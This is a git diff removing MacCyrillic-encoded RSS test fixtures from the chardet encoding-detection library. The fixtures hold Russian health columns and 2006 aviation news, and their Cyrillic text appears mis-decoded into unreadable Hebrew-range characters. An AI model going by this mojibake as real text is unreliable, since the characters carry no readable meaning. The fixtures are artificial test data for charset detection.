ןמהגונזום ךאך הועט, עאך ט גחנמסכו. —אשו גסודמ אםדטםא גמחםטךאוע טח-חא ןונומץכאזהוםט עוכא טכט מעהוכםץ ודמ קאסעוי, מסמבוםםמ םמד, םא פמםו סםטזוםט טללףםםמי חאשטע מנדאםטחלא, ןנט םוךאכמנטיםמל ןטעאםטט, ץנמםטקוסךמל סענוססו, ןונוףעמלכוםטט, םוהמסןאםטט. - - - ‚םטלאםטו םא ןמחגמםמקםטך - http://www.aif.ru/online/health/592/10_01 - - סעומץמםהנמח - המגמכםמ נאסןנמסענאםוםםמו חאבמכוגאםטו, ךמעמנמו נאחגטגאועס ף כ‏הוי כ‏במדמ גמחנאסעא. נטקול ג ןמסכוהםוו גנול ג סגחט ס לאכמןמהגטזםל מבנאחמל זטחםט ט לםמדמקאסמגל סטהוםטול חא ךמלן‏עונמל מם חאלועםמ ןמלמכמהוכ. אך ןמךאחאכט טססכוהמגאםט, ןנמגוהוםםו ג ˆםסעטעףעו םאעףנמןאעטט, ג ןנמפטכאךעטךו מסעומץמםהנמחא םאטבמכרטי ‎פפוךע מךאחגא‏ע לאססאז, כוקובםא דטלםאסעטךא, סאלמגעזוםטו רוט ט ןמחגמםמקםטךא, הטועא ט פטעמעונאןט. - - - ו סכטרךמל כט זטנםמ? - http://www.aif.ru/online/health/592/11_02 - - ‚בטנא םאטבמכוו ןמהץמהשטו הכ גאס גאנטאםע מעגועמג םא ךאזהי טח גמןנמסמג ‎עמדמ עוסעא, ג סלמזועו ג המסעאעמקםמי סעוןוםט מבתוךעטגםמ מןנוהוכטע - א םו "ןונובאנשטגאועו" כט ג ג סגמול ןטשוגמל נאצטמםו ס זטנאלט? - - - ˆחכוקטל כט אכךמדמכטחל? - http://www.aif.ru/online/health/592/12_01 - - "אך ט הכ קודמ כ‏הט סמחהא‏ע סובו במכוחםט ט ןנמבכול? אך ןמלמק כ‏הל טחלוםטע סגמ‏ זטחם? ˆ ךאך סהוכאע זטחם קוכמגוךא חהמנמגמי, סטכםמי ט סקאסעכטגמי?" נאךעטךף‏שטי ןסטץמעונאןוגע, ןסטץמכמד ט דמלומןאע ‚אכונטי ‘ˆ…‹ˆ‚ ןעאועס םאיעט מעגוע םא ‎עט גמןנמס... ‘ודמהם ל ןףבכטךףול דכאגף טח ךםטדט "’אים ןמהסמחםאםט", ג ךמעמנמי המךעמנ ‘טםוכםטךמג ןמלמדאוע ןמםע ןנטקטם עאךמי בוה, ךאך אכךמדמכטחל, ט ןמךאחגאוע ןףע טחבאגכוםט מע ‎עמי במכוחםט. - - - „טועמכמדט ג גמןנמסאץ ט מעגועאץ - http://www.aif.ru/online/health/592/14_01 - - ‘ודמהם םא גמןנמס קטעאעוכוי מעגוקאוע גנאק-הטועמכמד, המךעמנ לוהטצטםסךטץ םאףך טץאטכ ƒˆ‡“ƒ. - - - ‡אךאכול דמנכמ - http://www.aif.ru/online/health/592/15_01 - - ‚ <a href="http://www.aif.ru/online/health/591/04_01">ןנוההףשול םמלונו</a> ל נאססךאחאכט מ עמל, ךאך ןמגסטע ףסעמיקטגמסע ך ץמכמהף גמחהףץמןנמגמהשטץ ןףעוי םמסא, ךאך םףזםמ ןנאגטכםמ הראע םא למנמחו. € עוןונ - םוסךמכךמ סמגועמג, ךאך חאךאכטע דמנכמ. - - - ‘םטלאול ףעמלכוםטו - http://www.aif.ru/online/health/592/16_02 - - "ום מקום ףעמלכ‏ע םו עמכךמ הכטעוכםו ןמוחהךט ג אגעמלמבטכו, םמ ט המכדטו סטהוםט םא נאחכטקםמדמ נמהא סמגושאםטץ ט סמבנאםטץ. ˆ ושו בוסןמךמטע מבשוו ט םונגםמו םאןנזוםטו, א ג ןמסכוהםוו גנול - האזו דמכמגםו במכט. —עמ לםו למזוע ןמלמק?" -ˆדמנ ‘ מ ל מ ג, מסךגא - - - ‚חהףכס זטגמע - http://www.aif.ru/online/health/592/16_04 - - "—עמ ןמלמזוע ןנט גחהףעטט זטגמעא? —ול םאהמ ןטעאעס?" -…ךאעונטםא ., נוכ - - - מזםמ כט ןונווסע גטעאלטםמג? - http://www.aif.ru/online/health/592/16_06 - - "סום‏ ט חטלמי נוךמלוםהף‏ע ןטע במכרו גטעאלטםמג. ‘ךאזטעו, א ך קולף למזוע ןנטגוסעט טץ ןונוטחבעמך?" -‚. ‚ ו כ ט ך מ ג, ”נחוגמ - - - אבמעא םאה מבנאחמל - http://www.aif.ru/online/health/592/10_02 - - אגונםמו, םוע עאךמי זוםשטם, ךמעמנא םו ץמעוכא ב ץמנמרמ גדכהוע. סמבוםםמ ץמקועס ןמנאבמעאע םאה סגמטל מבנאחמל ןונוה ןנאחהםטךמל. אסעמשוי ןאכמקךמי-גנףקאכמקךמי סעאםףע לאסךט טח םאעףנאכםץ ןנמהףךעמג. - - - - diff --git a/chardet/tests/MacCyrillic/aug32.hole.ru.xml b/chardet/tests/MacCyrillic/aug32.hole.ru.xml deleted file mode 100644 index 55e0c12..0000000 --- a/chardet/tests/MacCyrillic/aug32.hole.ru.xml +++ /dev/null @@ -1,18 +0,0 @@ - - - - - €פטרא ’€ "32-ו €גדףסעא" - http://aug32.hole.ru/ - €פטרא ’€ "32-ו €גדףסעא" - - - 18.01.06 - <b>„…”…’› …—ˆ</b>. ‘מכםי ךמםצונע.<BR><I>‘אםךע ועונבףנד. מםצונעםי חאכ ךםטזםמדמ לאדאחטםא "ףךגמוה". א ןכ. ‚מססעאםט.</I> - http://aug32.hole.ru/afisha.htm - - - diff --git a/chardet/tests/MacCyrillic/aviaport.ru.xml b/chardet/tests/MacCyrillic/aviaport.ru.xml deleted file mode 100644 index c075a49..0000000 --- a/chardet/tests/MacCyrillic/aviaport.ru.xml +++ /dev/null @@ -1,289 +0,0 @@ - - - - - - €גטאמנע.Ru - http://www.aviaport.ru - €גטאצט טץ ןונגץ נףך - - http://www.aviaport.ru/images/aviaport_logo_yandex.gif - €גטאמנע.Ru - http://www.aviaport.ru - - - - איהום עוכא הגףץ ןמדטברטץ ג אגטאךאעאסענמפו ןמה •אנךמגמל - http://www.aviaport.ru/news/2006/01/02/99278.html - א עוננטעמנטט “ךנאטם נאחבטכס סאלמכוע ס ענול קכוםאלט ‎ךטןאזא, גכועוגרטי טח מסךג. ’וכא הגףץ ןמדטברטץ ןמהםע טח מחונא מלסמלמכסךמו, ךףהא ףןאכ סאלמכוע - Mon, 02 Jan 2006 17:25:00 +0300 - א עוננטעמנטט “ךנאטם נאחבטכס סאלמכוע ס ענול קכוםאלט ‎ךטןאזא, גכועוגרטי טח מסךג. ’וכא הגףץ ןמדטברטץ ןמהםע טח מחונא מלסמלמכסךמו, ךףהא ףןאכ סאלמכוע. אך סממבשאוע ךמננוסןמםהוםע אדוםעסעגא "ˆםעונפאךס-“ךנאטםא", ןמ ןנוהגאנטעוכםל האםםל, ‎עמ עוכא סע‏אנהוסס ט מהםמדמ טח ןטכמעמג. „כ ןמהתולא סאלמכועא מזטהא‏ע ןנטבעטו נמססטיסךטץ סןוצטאכטסעמג. אך סממבשטכט "ˆםעונפאךסף" ג ןנוסס-סכףזבו —‘ ”, ג ןמםוהוכםטך ג 11:16 ‘ נואךעטגםי סאלמכוע בטחםוס ךכאססא או-125, גכועוגרטי טח "˜ונולועוגמ-1", ףןאכ ג 3-4 ךטכמלוענאץ םוהאכוךמ מע א‎נמןמנעא •אנךמגא. ‚ —‘ המבאגטכט, קעמ קכום ‎ךטןאזא - דנאזהאםו מססטט. ‘אלמכוע חאנודטסענטנמגאם ג מסענמגםמל דמסףהאנסעגו €נףבא. ˆח •אנךמגא מם המכזום בכ המסעאגטע עףנטסעמג ג €כן. ןמטסךמגל נאבמעאל ןנטגכוקום םאחולםא ןמטסךמגא דנףןןא א‎נמןמנעא "•אנךמג", ןמהנאחהוכוםטו מןונאעטגםמ-סןאסאעוכםמי סכףזב ƒ“ טם—‘ ג •אנךמגסךמי מבכאסעט, גמהמכאח. ממנהטםאצט‏ ןמטסךמגמ-סןאסאעוכםץ נאבמע סמגונראוע •אנךמגסךטי נודטמםאכםי ךממנהטםאצטמםםי צוםענ ƒמסףהאנסעגוםםמי אגטאצטמםםמי ןמטסךמגמ-סןאסאעוכםמי סכףזב טם—‘ “ךנאטם. - - - - - מעמך ןאססאזטנמג קונוח א‎נמןמנע טלוםט ום-ƒףנטמםא גנמס םא 11% - http://www.aviaport.ru/news/2006/01/02/99277.html - ‚ 2005-ל דמהף קונוח א‎נמןמנע טלוםט ום-ƒףנטמםא ןנמרכט ןנטלונםמ 8,7 לטככטמםמג ןאססאזטנמג לוזהףםאנמהםץ ט םאצטמםאכםץ אגטאכטםטי. נטנמסע ןמ סנאגםוםט‏ ס 2004 דמהמל סמסעאגטכ מךמכמ 11% - Mon, 02 Jan 2006 13:29:00 +0300 - ‚ סודמהםרםול םמלונו The Marker (‎ךמםמלטקוסךמו ןנטכמזוםטו ך דאחועו "ƒאאנוצ") בכט מןףבכטךמגאם האםםו מ נמסעו ןמעמךא ןאססאזטנמג קונוח א‎נמןמנע טלוםט „אגטהא ום-ƒףנטמםא.‘מדכאסםמ סגוהוםטל, ןנוהמסעאגכוםםל אהלטםטסענאצטוי א‎נמןמנעא, ג 2005-ל דמהף קונוח א‎נמןמנע טלוםט ום-ƒףנטמםא ןנמרכט ןנטלונםמ 8,7 לטככטמםמג ןאססאזטנמג לוזהףםאנמהםץ ט םאצטמםאכםץ אגטאכטםטי. נטנמסע ןמ סנאגםוםט‏ ס 2004 דמהמל סמסעאגטכ מךמכמ 11%. נטנמסע םא לוזהףםאנמהםץ אגטאכטםטץ סמסעאגטכ ןנטלונםמ 5,3% ןמ סנאגםוםט‏ ס ןנמרכל דמהמל.The Marker ןףבכטךףוע האםםו חא ענט םוהוכט טח זטחםט א‎נמןמנעא: 1-21 הוךאבנ א‎נמןמנע ןנטםכ ןנטלונםמ 360,7 עסק ןאססאזטנמג, קעמ םא 1,4% גרו ןנמרכמדמהםודמ ןמךאחאעוכ חא אםאכמדטקםי ןונטמה. —טסכמ ןנטבגרטץ ןאססאזטנמג לוזהףםאנמהםץ אגטאכטםטי סמסעאגטכמ ןנטלונםמ 176 עסק (ןנטנמסע םא 0,7%), קטסכמ גכועוגרטץ ןאססאזטנמג סמסעאגטכמ 164,5 עסק (ןנטנמסע םא 2,2%).—עמ ךאסאועס גםףענוםםטץ אגטאכטםטי, 1-21 הוךאבנ קונוח א‎נמןמנע טלוםט ום-ƒףנטמםא ןנמרכט ןנטלונםמ 20,1 עסק ןאססאזטנמג, קעמ םא 1,7% גרו אםאכמדטקםמדמ ןמךאחאעוכ ג ןנוההףשול דמהף. „גטזוםטו סאלמכועמג םא גםףענוםםטץ אגטאכטםטץ סמסעאגטכמ 428 גחכועמג ט ןמסאהמך (ןנטנמסע ג נאחלונו 3,6%). - - - - - „כ עףרוםט ןמזאנמג ג ‘˜€ ןנטגכוקום גונעמכוע אצטמםאכםמי דגאנהטט - http://www.aviaport.ru/news/2006/01/02/99276.html - ‚ נהו רעאעמג ‘˜€ בףרף‏ע כוסםו ןמזאנ. „כ כטךגטהאצטט ןמזאנמג חאהויסעגף‏עס גונעמכוע אצטמםאכםמי דגאנהטט רעאעא ’וץאס - Mon, 02 Jan 2006 13:28:00 +0300 - ‚ נהו רעאעמג ‘˜€ בףרף‏ע כוסםו ןמזאנ, סממבשטכט ןנוהסעאגטעוכט ןמזאנםמי סכףזב סענאם. ’אך, מקאדט גמחדמנאםטי חאנודטסענטנמגאם ג רעאעאץ ךכאץמלא, ’וץאס ט ‏-וךסטךמ. נט ‎עמל ןכמשאה מעהוכםץ ןמזאנמג םא דנאםטצו ’וץאס ט ‏-וךסטךמ המסעטדאוע 20 עס. דא. „כ כטךגטהאצטט ןמזאנמג חאהויסעגף‏עס גונעמכוע אצטמםאכםמי דגאנהטט רעאעא ’וץאס. סםמגםלט ןנטקטםאלט כוסםץ ןמזאנמג, ןנמהמכזא‏שטץס ס ךמםצא הוךאבנ 2005 ד. ג נהו ‏דמ-חאןאהםץ נאימםאץ ‘˜€, גכ‏עס חאסףץא, אםמלאכםמ גסמךא הכ ‎עמדמ גנולוםט דמהא עולןונאעףנא גמחהףץא ט סטכםי גועונ, ןונוהאוע €. - - - - - א במנעף פנאםצףחסךמדמ סאלמכועא זוםשטםא נמהטכא נובוםךא - http://www.aviaport.ru/news/2006/01/02/99275.html - א במנעף ןאססאזטנסךמדמ סאלמכועא אגטאךמלןאםטט Air Austral, כועוגרודמ טח ”נאםצטט םא מסענמג ו‏םמם, זוםשטםא נמהטכא נובוםךא - Mon, 02 Jan 2006 13:25:00 +0300 - א במנעף ןאססאזטנסךמדמ סאלמכועא אגטאךמלןאםטט Air Austral, כועוגרודמ טח ”נאםצטט םא מסענמג ו‏םמם, זוםשטםא נמהטכא נובוםךא. אכקטךא םאחגאכט €כ-”אוה.עמ ןנמטחמרכמ ושו ג סףבבמעף. מסכו גכועא טח ‹טמםא סע‏אנהוססא חאלועטכא, קעמ זוםשטםא סכטרךמל המכדמ סטהטע ג עףאכועו. םא ןמלמדכא ןנטםע נמה, א םאץמהטגרטיס םא במנעף גנאק ןונונוחאכ ןףןמגטםף.‘אל ןמכוע ןנמהמכזאכס ןע קאסמג.מ ןנאגטכאל אגטאןונוגמחמך, זוםשטם ס בונולוםםמסע‏ במכוו סולט לוסצוג ך ןמכועף םו המןףסךא‏עס. ‘מענףהםטךט אגטאךמלןאםטט ףעגונזהא‏ע, קעמ בונולוםםמסעט ף ‎עמי זוםשטם םו בכמ גטהםמ. - - - - - א גמסעמךו €גסענאכטט םובמכרמי סאלמכוע ףןאכ ג גמהמול - http://www.aviaport.ru/news/2006/01/02/99274.html - א גמסעמךו €גסענאכטט ףןאכ ג גמהף םובמכרמי מהםמלמעמנםי סאלמכוע, ןמכטצט ןמהעגונהטכא דטבוכ ןעט קוכמגוך. א במנעף סאלמכועא Cessna-206 םאץמהטכטס סול קוכמגוך - Mon, 02 Jan 2006 13:24:00 +0300 - א גמסעמךו €גסענאכטט ףןאכ ג גמהף םובמכרמי מהםמלמעמנםי סאלמכוע, ןמכטצט ןמהעגונהטכא דטבוכ ןעט קוכמגוך, סממבשאוע אדוםעסעגמ €ססמרט‎יעוה נוסס.מ האםםל ןמכטצטט רעאעא גטםסכוםה, דהו ט ןנמטחמרוכ טםצטהוםע, םא במנעף סאלמכועא Cessna-206 םאץמהטכטס סול קוכמגוך - רוסע ןאססאזטנמג-ןאנאר‏עטסעמג ט ןטכמע. „גא קוכמגוךא גזטכט, מםט דמסןטעאכטחטנמגאם, סממבשאוע ןמכטצט.אםוו סממבשאכמס מב מהםמל ןמדטברול.‘אלמכוע ףןאכ ג גמהמול םוהאכוךמ מע דמנמהא ˆןסףטק םא גמסעמךו רעאעא סנאחף זו ןמסכו גחכועא. נטקטם ןנמטסרוהרודמ גסם‏עס. - - - - - אכטפמנםט: הגא קוכמגוךא ןמדטבכט ג נוחףכעאעו אגטאךאעאסענמפ - http://www.aviaport.ru/news/2006/01/02/99273.html - ‚ נוחףכעאעו ךנףרוםט ג ‘˜€, רעאע €יהאץמ, קאסעםמדמ נואךעטגםמדמ סאלמכועא ןמדטבכט הגא קוכמגוךא, םאץמהטגרטץס םא ודמ במנעף - Mon, 02 Jan 2006 13:23:00 +0300 - County סממבשטכ זףנםאכטסעאל מ עמל, קעמ ג לטםףגרף‏ ןעםטצף ג נוחףכעאעו ךנףרוםט קאסעםמדמ נואךעטגםמדמ סאלמכועא ןמדטבכט הגא קוכמגוךא, םאץמהטגרטץס םא ודמ במנעף. ˜ונטפ ףעמקםטכ, קעמ ךאעאסענמפא ןנמטחמרכא ג 15 ךטכמלוענאץ ך ‏דף מע לוסעםמדמ א‎נמןמנעא ’נאךט, ג 14:00 ג ןעםטצף.‘כףזב א‎נמןמנעא ןמהעגונהטכט, קעמ סאלמכוע קאסעםמי ךמלןאםטט, םא במנעף ךמעמנמדמ םאץמהטכטס, ןמ נאחםמי טםפמנלאצטט, רוסע טכט גמסול קוכמגוך, םאןנאגככס ג א‎נמןמנע ’נאךט טח ’גטם-”מככח, רעאע €יהאץמ. מ םוגסםוםםל ןמךא ןנטקטםאל, לארטםא נוחךמ טחלוםטכא ךףנס, א חאעול סגח ס םוי ןנמןאכא מךמםקאעוכםמ.אןנאגכוםםו םא לוסעמ ןמסכוהםודמ נאהטמסטדםאכא סןאסאעוכט מבםאנףזטכט דמנשטו מבכמלךט סאלמכועא. מךא םוע עמקםמי טםפמנלאצטט מ עמל, קעמ ןנמטחמרכמ ס מסעאכםלט קכוםאלט ‎ךטןאזא, ט ןאססאזטנאלט, םאץמהטגרטלטס םא במנעף סאלמכועא. ‚ םאסעמשוו גנול ןמ האםםמלף הוכף גוהועס נאססכוהמגאםטו. - - - - - —טםטע סאלמכוע נאחנורטכט גסול זוכא‏שטל - http://www.aviaport.ru/news/2006/01/02/99272.html - ‘ 1 םגאנ 2006 דמהא ג מססטט גסעףןטכ ג סטכף חאךמם, מעלום‏שטי מבחאעוכםמו כטצוםחטנמגאםטו 50 גטהמג ןנוהןנטםטלאעוכסךמי הועוכםמסעט - Mon, 02 Jan 2006 13:22:00 +0300 - ‘ 1 םגאנ 2006 דמהא ג מססטט גסעףןטכ ג סטכף חאךמם, מעלום‏שטי מבחאעוכםמו כטצוםחטנמגאםטו 50 גטהמג ןנוהןנטםטלאעוכסךמי הועוכםמסעט, סממבשאוע ˆ€ "מגמסעט". עמע זו חאךמם הוכאוע מבחאעוכםל כטצוםחטנמגאםטו םוסךמכךטץ גטהמג הועוכםמסעט, הכ ךמעמנץ נאםוו סןוצטאכםץ נאחנורוםטי םו ענובמגאכמס. ‚ קאסעםמסעט - טדמנםמדמ בטחםוסא.‘מדכאסםמ גסעףןטגרולף ג סטכף המךףלוםעף, עוןונ םו םףזםמ ןמכףקאע כטצוםחט‏ ןנוהןנטםטלאעוכל, מךאחגא‏שטל ףסכףדט ג ספונו עףנטחלא. ’אךזו כטצוםחט םו ןמםאהמבטעס הכ ןונוגמחךט ןאססאזטנמג כודךמגל אגעמענאםסןמנעמל, ןנמטחגמהסעגא עאבאקםץ טחהוכטי, עוץםטקוסךמדמ מבסכףזטגאםט גמחהףרםץ סףהמג, ‎ךסןכףאעאצטט םופעוהמבגא‏שטץ ןנמטחגמהסעג ט ענאםסןמנעא םופעט ט דאחא.ומבץמהטלמסע ןמכףקוםט כטצוםחטי םא מהםט גטה הועוכםמסעט מעלוםועס ס 1 םגאנ 2006 דמהא, םא הנףדטו - ס 1 םגאנ 2007 דמהא, א הכ מסעאכםץ גטהמג ןנוהןנטםטלאעוכסךמי הועוכםמסעט - עמכךמ ןמסכו גסעףןכוםט ג סטכף סממעגועסעגף‏שטץ עוץםטקוסךטץ נודכאלוםעמג.’אךזו חאךמם ףןנמשאוע ןמכףקוםט כטצוםחטי ט ףעמקםוע ןמכםמלמקט סממעגועסעגף‏שטץ פוהונאכםץ מנדאםמג גכאסעט. - - - - - ”והמנמגךו ןמהבונףע ןמהנהקטךא - http://www.aviaport.ru/news/2006/01/02/99271.html - —טםמגםטךט ןנאגטעוכסעגא לסךמי מבכאסעט םאחמגףע דוםונאכםמדמ ןמהנהקטךא סענמטעוכסעגא םמגמדמ א‎נמןמנעא לסך-”והמנמגךא - Mon, 02 Jan 2006 13:08:00 +0300 - אך סעאכמ טחגוסעםמ "", סודמהם קטםמגםטךט ןנאגטעוכסעגא לסךמי מבכאסעט םאחמגףע דוםונאכםמדמ ןמהנהקטךא סענמטעוכסעגא םמגמדמ א‎נמןמנעא לסך-”והמנמגךא. מגו גמחהףרםו גמנמעא לסךא, םא חאגונרוםטו סענמטעוכסעגא ךמעמנץ ןמענובףועס במכוו 5 לכנה נףב., בףהףע גגוהום ג ‎ךסןכףאעאצט‏ ףזו ג 2008 דמהף. ‡א ןמכףקוםטו דוםונאכםמדמ ןמהנהא, סעמטלמסע ךמעמנמדמ עמכךמ ג סכוהף‏שול דמהף ןנוגסטע 1 לכנה נףב., ןמסןמנע מלסךטו סענמטעוכםו ךמלןאםטט "‘” "מכוע ט " ט " "מסעמגטך",א עאךזו ע‏לוםסךא ‡€ "€‎נמהנמלהמנסענמי".ƒוםונאכםמדמ ןמהנהקטךא סענמטעוכסעגא א‎נמןמנעא לסך-”והמנמגךא סןוצטאכםא ךמםךףנסםא ךמלטססט ןנאגטעוכסעגא נטטנער מןנוהוככא גקונא המ ןמחהםודמ גוקונא. "‚ עוםהונו ןנטםטלא‏ע ףקאסעטו מלסךטי פטכטאכ ע‏לוםסךמדמ ‡€ "€‎נמהנמלהמנסענמי", א עאךזו לוסעםו סענמטעוכםו ךמלןאםטט ‘” "מכוע ט ", ט "מסעמגטך", - נאססךאחאכ םאקאכםטך ףןנאגכוםט לטםטסעונסעגא ןנמלרכוםםמי ןמכטעטךט, ענאםסןמנעא ט סגחט ןנאגטעוכסעגא לסךמי מבכאסעט €כוךסאםהנ ףרךאנוג. מ ודמ סכמגאל, ןנועוםהוםע םא ןמכףקוםטו דוםונאכםמדמ ןמהנהא המכזם בכט המךאחאע, קעמ מבכאהא‏ע גסולט םומבץמהטללט ךאהנמגלט ט עוץםטקוסךטלט גמחלמזםמסעלט הכ גוהוםט סעמכ לאסרעאבםמי סענמיךט.אןמלםטל, מב אךעטגםמל ףקאסעטט מבכאסעםץ גכאסעוי ג סענמטעוכסעגו םמגמדמ א‎נמןמנעא דףבונםאעמנ ‹ומםטה מכוזאוג חאגטכ 8 הוךאבנ עוךףשודמ דמהא םא חאסוהאםטט אנץטעוךעףנםמ-דנאהמסענמטעוכםמדמ סמגועא נודטמםא. "7 םמבנ 2008 דמהא ל גחכועטל ס א‎נמןמנעא ”והמנמגךא. ףזםמ סעאגטע ןונוה סמבמי סונוחםו חאהאקט", - ןממבושאכ עמדהא דףבונםאעמנ.א סענמטעוכסעגמ םמגמדמ א‎נמןמנעא ךאחםא נטטנער ג בףהףשול דמהף ןמענאעטע 1 לכנה נףב. אך סממבשטכ ט. מ. לטםטסענא פטםאםסמג לסךמי מבכאסעט טץאטכ †האםמג, נאסץמה םא גמחגוהוםטו א‎נמןמנעא ןמךא םו חאכמזום מעהוכםמי סענמךמי ג ב‏הזועו נטטנער םא 2006 דמה. "עא סעאע בףהוע ןנמפטםאםסטנמגאםא חא סקוע המןמכםטעוכםץ המץמהמג ךאחם טכט ןונונאסןנוהוכוםט קאסעט נאסץמהמג םא םוןנטמנטעועםו חאהאקט", - סממבשטכ דמסןמהטם †האםמג.‚מחגוהוםטו ג לסךו א‎נמןמנעא ”והמנמגךא םאקאכמס ג 1982 דמהף. ‘האקא מבתוךעא ג סענמי בכא חאןכאםטנמגאםא םא 1993 דמה. הםאךמ פטםאםסטנמגאםטו סענמטעוכסעגא בכמ ןנוךנאשוםמ ג םאקאכו 90-ץ דמהמג, ך ‎עמלף גנולוםט גחכועםמ-ןמסאהמקםא ןמכמסא ט מבתוךע טםפנאסענףךעףנ בכט דמעמג םא 65%. ‚ םאסעמשטי למלוםע םוהמסענמוםםי א‎נמןמנע נאסןמכאדאוע גחכועםמי ןמכמסמי הכטםמי 2930 ל ט ךמעוכםמי למשםמסע‏ 54 ‚ע. א‎נמןמנעף ןמהגוהום גמהמגמה, ‎כוךענמסועט, דאחמןנמגמה ט זוכוחםמהמנמזםא לאדטסענאכ.”טםאםסטנמגאםטו סענמטעוכסעגא םאקםועס ןמסכו עמדמ, ךאך קטםמגםטךט נוראע גמןנמס ס ןונוגמהמל ”והמנמגךט ג נודטמםאכםף‏ סמבסעגוםםמסע. "‘ויקאס ל ףזו מבנאעטכטס ג נמססטיסךמו אדוםעסעגמ "מסטלףשוסעגמ". ˆ ןמךא ‎עא ןנמצוהףנא (ןונוהאקא ג סמבסעגוםםמסע נודטמםא. - "") םו בףהוע ןנמגוהוםא, ך סענמטעוכסעגף א‎נמןמנעא ל ןנטסעףןאע םו בףהול. םו סמלםוגאולס, קעמ גסו םומבץמהטלו בףלאדט בףהףע מפמנלכום ג ןונגמל ךגאנעאכו סכוהף‏שודמ דמהא", - ןמהוכטכס ןנמדםמחמל €כוךסאםהנ ףרךאנוג. מ ודמ האםםל, סמגמךףןםו חאענאע ןמ חאגונרוםט‏ סענמטעוכסעגא םמגמדמ מלסךמדמ א‎נמןמנעא סמסעאגע במכוו 5 לכנה נףב. מ סכמגאל ט. מ. דוםונאכםמדמ הטנוךעמנא € "לסך-”והמנמגךא" ‚אכונט מןמגא, המ 65% מע מבשודמ מבתולא פטםאםסטנמגאםט ג בףהףשול דמהף בףהוע םאןנאגכוםמ םא נוךמםסענףךצט‏ גחכועםמ-ןמסאהמקםמי ןמכמס. "‘ויקאס םףזםמ מבוסןוקטע בוסןונובמיםמו סםאבזוםטו סענמטעוכםמי ןכמשאהךט גמהמי ט ‎כוךענטקוסעגמל, ןמהדמעמגטע לוסעא הכ נאחלושוםט כ‏הוי ט עוץםטךט, קעמב ג אןנוכו למזםמ בכמ ןנטסעףןטע ך אךעטגםמלף סענמטעוכסעגף", - סממבשטכ דמסןמהטם מןמג.זטהאועס, קעמ נוחףכעאע ךמםךףנסא ןמ מןנוהוכוםט‏ דוםונאכםמדמ ןמהנהקטךא סענמטעוכסעגא א‎נמןמנעא לסך-”והמנמגךא קטםמגםטךט מבםאנמהף‏ע סודמהם. - - - - - נמטחגמהטעוכט €ם-140 סמדכאסם ס גגמהאלט ךמלטססטט - http://www.aviaport.ru/news/2006/01/02/99270.html - נוהסעאגטעוכט •ƒ€ ןמהעגונהטכט, קעמ סמדכאסם סמ גסולט גגמהאלט, ך ךמעמנל ןנטרכא ךמלטססט ןמ נאססכוהמגאםט‏ ןנטקטם ךאעאסענמפ סאלמכועא €ם-140 - Mon, 02 Jan 2006 13:05:00 +0300 - ‚קונא ןנוהסעאגטעוכט •אנךמגסךמדמ דמסףהאנסעגוםםמדמ אגטאצטמםםמדמ ןנמטחגמהסעגוםםמדמ ןנוהןנטעט (•ƒ€) ןמהעגונהטכט, קעמ סמדכאסם סמ גסולט גגמהאלט, ך ךמעמנל ןנטרכא ךמלטססט ןמ נאססכוהמגאםט‏ ןנטקטם ךאעאסענמפ סאלמכועא €ם-140, ג נאבמעו ךמעמנמי ןנטםטלאכ ףקאסעטו •ƒ€. מסכו מבםאנמהמגאםט ןונגץ נוחףכעאעמג נאססכוהמגאםט ג םוךמעמנץ ‘ˆ ןמגטכאס טםפמנלאצט מ עמל, קעמ ןנמטחגמהטעוכט נאחבטגרודמס סאלמכועא םו נאחהוכ‏ע לםוםטו ךמלטססטט. ‚קונא ‎עא טםפמנלאצט בכא מןנמגונדםףעא הוןאנעאלוםעמל ןמ סגחל ס מבשוסעגוםםמסע‏ •ƒ€.מלטססט, ג סמסעאג ךמעמנמי גמרכט ןנוהסעאגטעוכט €’ טל. €םעמםמגא (נאחנאבמעקטך סאלמכועא), ‡אןמנמזסךמדמ לארטםמסענמטעוכםמדמ ךמםסענףךעמנסךמדמ ב‏נמ "נמדנוסס" (נאחנאבמעקטך הגטדאעוכ), •ƒ€ ט חאןמנמזסךמי ךמלןאםטט "מעמנ ‘טק" (ןנמטחגמהטעוכ הגטדאעוכוי), נאסרטפנמגאג "קונםי שטך" ןנטרכא ך גגמהף, קעמ םא גסמעו 2100 ל סאלמכוע םאקאכ סםטזוםטו ןמ סןטנאכט, סמגונרטג קוענו גטעךא. —ונוח םוסךמכךמ סוךףםה סגח ס ‎ךטןאזול ןנמןאכא, ןמסכו קודמ סאלמכוע טסקוח ס נאהאנמג. ונגו נוחףכעאע נאססכוהמגאםט ןמךאחאכט, קעמ הגטדאעוכט סאלמכועא, סטסעול ףןנאגכוםט ט ‎םונדמסםאבזוםט בכט טסןנאגם. נטקטםמי ךאעאסענמפ למדכא סעאע םוטסןנאגםמסע אגטאדמנטחמםעמג - ןנטבמנמג, ןמךאחגא‏שטץ ןמכמזוםטו סאלמכועא ג ןנמסענאםסעגו.אןמלםטל, קעמ 23 הוךאבנ ןמה אךף ןנמטחמרכמ ךנףרוםטו סאלמכועא ץאנךמגסךמדמ ןנמטחגמהסעגא €ם-140, גןמכםגרודמ נויס אךף - €ךעאף. ‚ נוחףכעאעו ךאעאסענמפ ןמדטבכט 23 קוכמגוךא. נאגטעוכסעגמ €חונבאיהזאםא ןנטמסעאםמגטכמ ‎ךסןכףאעאצט‏ סאלמכועמג €ם-140 המ מךמםקאםט נאססכוהמגאםט ןנטקטם ךאעאסענמפ. - - - - - מבטםחמם "ןמםוגמכו" - http://www.aviaport.ru/news/2006/01/02/99268.html - †טעוכ ‚וכטךמבנטעאםטט, זוכאגרטי גסענועטע מגי דמה ג ךמלןאםטט הנףחוי םא מסענמגו ’וםונופו, ןמןאכ ג חאענףהםטעוכםף‏ סטעףאצט‏, סעאג "מבטםחמםמל ןמםוגמכו" - Mon, 02 Jan 2006 13:03:00 +0300 - †טעוכ ‚וכטךמבנטעאםטט, סענאסעםמ זוכאגרטי גסענועטע מגי דמה ג ךמלןאםטט הנףחוי םא טסןאםסךמל מסענמגו ’וםונופו, ןמןאכ ג גוסלא חאענףהםטעוכםף‏ סטעףאצט‏, סעאג ןונוה ןנאחהםטךמל "מבטםחמםמל ןמםוגמכו".מלאםהטנ אגטאכאיםונא, סכוהמגאגרודמ נויסמל ZB-558 םא ’וםונטפו טח אםקוסעונא, ןנטםכ נורוםטו סמגונרטע םוחאןכאםטנמגאםםף‏ ןמסאהךף, קעמב גסאהטע ןונוןטגרודמ גמ גנול נויסא ןאססאזטנא. ’מע םאקאכ סךגונםמסכמגטע ג אהנוס ןאססאזטנמג ט ךמלאםה, ןנמטדםמנטנמגאג ענובמגאםטו ףסןמךמטעס. ‚ ‎עמע למלוםע כאיםונ, םא במנעף ךמעמנמדמ 